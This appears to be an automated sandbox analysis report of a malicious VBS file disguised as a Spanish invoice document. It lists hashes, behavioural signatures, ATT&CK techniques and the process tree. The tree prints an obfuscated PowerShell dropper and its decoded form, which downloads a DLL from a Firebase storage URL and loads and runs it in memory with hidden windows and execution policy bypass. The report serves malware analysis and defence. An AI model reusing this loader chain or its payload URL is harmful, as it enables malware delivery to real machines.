594a29480b7fce9d4e200b08fcded341d776420303a8ea955333a7b7971c4512

General

Target

DOCUMENTO DE CORRESPODIENTE A FAV-106 FAV 109.vbs
Size

562KB
MD5

e0374295f58128949b5876934737b630
SHA1

cca48afe8f320a963d3e0024ee0a3f0f8bdfe635
SHA256

594a29480b7fce9d4e200b08fcded341d776420303a8ea955333a7b7971c4512
SHA512

91beecd85f6343370034465fba5ab178a0b3d6de91e90acaa70b3c378968b5068cdebc59921dd5899bf133d326dac75ea4c2c26f1728d11edcbf2f05c255b72b
SSDEEP

192:fnh4wl8t0iFzx5o1QS/j14ta1k0yPPaNIfALuQ1Pbk:awKtR53PPaNIfALuQ1Q

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/fir-3b506.appspot.com/o/dll%2Fnego.txt?alt=media&token=f068e42c-0fbc-4dcc-9984-985de5d7ed9c

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	972	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
112	powershell.exe
972	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1504 wrote to memory of 112	1504	WScript.exe	26
PID 1504 wrote to memory of 112	1504	WScript.exe	26
PID 1504 wrote to memory of 112	1504	WScript.exe	26
PID 112 wrote to memory of 972	112	powershell.exe	28
PID 112 wrote to memory of 972	112	powershell.exe	28
PID 112 wrote to memory of 972	112	powershell.exe	28

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENTO DE CORRESPODIENTE A FAV-106 FAV 109.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ntfYq = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCzALMAtwC0ALQAugC0AKoAtACyALcAugCzALMAtwC0ALQAugC0AKoAtACyALcAugAnADsAWwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAHMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG❞❞❞ANgA0AFMAdAByAGkAbgBnACgAKABOAG❞❞❞AdwAtAE8AYgBqAG❞❞❞AYwB0ACAATgBlAHQALgBXAG❞❞❞AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAG❞❞❞ALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AZgBpAHIALQAzAGIANQAwADYALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AZABsAGwAJQAyAEYAbgBlAGcAbwAuAHQAeAB0AD8AYQBsAHQAPQBtAG❞❞❞AZABpAGEAJgB0AG8AawBlAG4APQBmADAANgA4AG❞❞❞ANAAyAGMALQAwAGYAYgBjAC0ANABkAGMAYwAtADkAOQA4ADQALQA5ADgANQBkAG❞❞❞ANQBkADcAZQBkADkAYwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH❞❞❞AcgByAG❞❞❞AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG❞❞❞AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH❞❞❞AbABsACwAIABbAG8AYgBqAG❞❞❞AYwB0AFsAXQBdACAAKAAnAGIAMwA2ADMAMQA1ADYANwA2AG❞❞❞AZgBiAC0AOABlAD❞❞❞AOQAtAGYAMABiADQALQA3ADgAZgAwAC0AMwA5AGYANgBjADkANwA2AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuAGkAcgBwAGkAcgBwAC8AbwAvAG0AbwBjAC4AdABvAHAAcwBwAHAAYQAuADcAYQA2ADMAZQAtAHMAcwBlAGwAYgAvAGIALwAwAHYALwBtAG8AYwAuAHMAaQBwAGEAZQBsAGcAbwBvAGcALgBlAGcAYQByAG8AdABzAG❞❞❞AcwBhAGIAZQByAGkAZgAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ntfYq.replace('❞❞❞','U') ) );$OWjuxD = $OWjuxD.replace('³³·´´º´ª´²·º³³·´´º´ª´²·º', 'C:\Users\Admin\AppData\Local\Temp\DOCUMENTO DE CORRESPODIENTE A FAV-106 FAV 109.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DOCUMENTO DE CORRESPODIENTE A FAV-106 FAV 109.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/fir-3b506.appspot.com/o/dll%2Fnego.txt?alt=media&token=f068e42c-0fbc-4dcc-9984-985de5d7ed9c'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('b36315676efb-8e59-f0b4-78f0-39f6c976=nekot&aidem=tla?txt.irpirp/o/moc.topsppa.7a63e-sselb/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'Roda' ))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6b1129a165d82a107587d5a1234a10eb

SHA1
1eff99ebd6e53a259832f955f5b13ca59b7d11cc

SHA256
7f8df1375b61a970b963de0326476c317911511830ad8ec36d7b169bdc9d7f8e

SHA512
65b6d3132ca37e481d4f2df3166d8319ec4f9cca3ba6de0b1d8d6153f2427daf464a2f909b4f229df7814058008813f6c262680df0875be6f3a7ae2e4bd24ffd

Download Submit
memory/112-65-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/112-55-0x0000000000000000-mapping.dmp

Download
memory/112-57-0x000007FEF4760000-0x000007FEF5183000-memory.dmp

Filesize
10.1MB

Download
memory/112-58-0x000007FEF3C00000-0x000007FEF475D000-memory.dmp

Filesize
11.4MB

Download
memory/112-59-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/112-72-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/112-71-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/972-64-0x000007FEF3C00000-0x000007FEF475D000-memory.dmp

Filesize
11.4MB

Download
memory/972-66-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/972-67-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/972-68-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/972-69-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/972-70-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/972-63-0x000007FEF4760000-0x000007FEF5183000-memory.dmp

Filesize
10.1MB

Download
memory/972-60-0x0000000000000000-mapping.dmp

Download
memory/1504-54-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing